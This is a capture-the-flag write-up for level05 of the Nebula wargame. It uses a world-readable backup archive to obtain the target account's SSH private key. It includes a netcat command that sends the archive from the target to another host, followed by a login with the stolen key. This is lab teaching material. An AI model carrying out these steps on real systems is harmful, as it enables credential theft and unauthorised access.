This is the write-up for level05 of Nebula wargame. We are told to check the flag05 home directory and look for weak permissions.

level05@nebula:/home/flag05$ ls -la
total 28
drwxr-x---  4 flag05 level05 4096 2011-11-20 21:22 .
drwxr-xr-x 43 root   root    4096 2012-10-14 07:20 ..
drwxr-xr-x  2 flag05 flag05  4096 2011-11-20 20:13 .backup
-rw-r--r--  1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
-rw-r--r--  1 flag05 flag05  3353 2011-05-18 02:54 .bashrc
-rw-r--r--  1 flag05 flag05   675 2011-05-18 02:54 .profile
drwx------  2 flag05 flag05  4096 2011-11-20 20:13 .ssh

World readable backup! Checking the directory content, we find a gzipped tar archive.

level05@nebula:/home/flag05$ ls -la .backup/
total 12
drwxr-xr-x 2 flag05 flag05  4096 2011-11-20 20:13 .
drwxr-x--- 5 flag05 level05 4096 2012-10-14 10:47 ..
-rw-rw-r-- 1 flag05 flag05  1826 2011-11-20 20:13 backup-19072011.tgz

We copy that to our local machine using netcat.

kroosec@dojo:~$ nc -l 2000 > /tmp/backup.tgz

level05@nebula:/home/flag05$ nc 192.168.1.51 2000 < backup-19072011.tgz

And extract the archive with tar utility.

kroosec@dojo:~/tmp$ tar zxvf /tmp/backup.tgz 
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys

An ssh key, just there, waiting to be used. We can use that to login with the flag05 user account.

kroosec@dojo:~/test$ ssh flag05@192.168.1.3 -i .ssh/id_rsa

And run getflag!

flag05@nebula:~$ getflag
You have successfully executed getflag on a target account